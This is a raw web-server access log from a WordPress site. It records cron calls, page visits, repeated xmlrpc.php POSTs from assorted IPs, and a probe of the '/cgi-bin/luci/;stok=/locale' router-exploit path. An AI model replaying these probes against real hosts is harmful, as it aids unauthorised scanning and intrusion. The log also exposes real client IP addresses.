36.133.115.36 - - [20/Oct/2025:19:29:40 +0800] "POST /wp-cron.php?doing_wp_cron=1760959780.6308660507202148437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
158.220.116.163 - - [20/Oct/2025:19:29:40 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68"
36.133.115.36 - - [20/Oct/2025:19:33:32 +0800] "POST /wp-cron.php?doing_wp_cron=1760960012.0572550296783447265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
81.88.53.143 - - [20/Oct/2025:19:33:32 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
36.133.115.36 - - [20/Oct/2025:19:35:48 +0800] "POST /wp-cron.php?doing_wp_cron=1760960148.7891340255737304687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
5.253.86.217 - - [20/Oct/2025:19:35:48 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
5.253.86.217 - - [20/Oct/2025:19:35:50 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [20/Oct/2025:19:37:15 +0800] "POST /wp-cron.php?doing_wp_cron=1760960235.0202760696411132812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
221.178.143.70 - - [20/Oct/2025:19:37:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
221.178.143.70 - - [20/Oct/2025:19:37:16 +0800] "GET / HTTP/1.1" 200 33468 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
52.221.97.93 - - [20/Oct/2025:19:37:24 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
36.133.115.36 - - [20/Oct/2025:19:37:47 +0800] "POST /wp-cron.php?doing_wp_cron=1760960267.1364300251007080078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.150.60.24 - - [20/Oct/2025:19:37:47 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009040820 Firefox/3.0.9"
36.150.60.24 - - [20/Oct/2025:19:38:00 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
36.150.60.24 - - [20/Oct/2025:19:38:00 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
